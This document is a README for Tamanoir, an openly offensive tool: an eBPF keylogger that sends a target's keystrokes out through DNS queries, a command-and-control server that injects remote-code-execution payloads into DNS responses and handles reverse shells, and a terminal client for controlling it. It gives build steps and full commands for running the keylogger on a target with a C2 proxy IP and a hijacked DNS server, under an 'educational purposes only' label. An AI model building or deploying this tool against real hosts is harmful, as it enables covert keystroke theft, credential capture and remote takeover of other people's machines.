Tamanoir is structured around 3 components:
An eBPF program running on a target host, it will act as a keylogger and extract keystrokes via DNS queries.
In DNS response, attacker can choose to send chunks of RCE payload that will be executed on targeted host.
The Command & Control server. It acts as a DNS proxy and can inject rce payloads in DNS response.
It also can handle reverse shell connections.
The TUI client communicating with C2 server. Built on top of ratatui
- what is eBPF
- C2: Command and Control
- RCE: Remote Code Execution
Jump to:
You need a Linux based OS.
To build from source, make sure you have:
- bpf-linker installed.
- Rust installed with
nightly
toolchain. - protobuf-compiler
cd tamanoir-ebpf && cargo build --release
cargo build -p tamanoir --release
cargo build -p tamanoir-c2 --release
cargo build -p tamanoir-tui --release
These commands will produce tamanoir
, tamanoir-c2
and tamanoir-tui
executables in target/release
that you can add to your$PATH
You can download the pre-built binaries from the release page
🖥️ on target host:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip <C2 server IP> \
--hijack-ip <locally configured DNS server IP> \
--iface <network interface name>
for example:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.15 \
--hijack-ip 8.8.8.8 \
--iface wlan0
🖥️ on your C2 server host:
sudo tamanoir-c2 start
Note
Make sure port 53 is available
🖥️ wherever you want to use the client:
tamanoir-tui -i <C2 server IP>
Note
Make sure C2 server is reachable on port 50051
Tamanoir
is developed for educational purposes only
GPLv3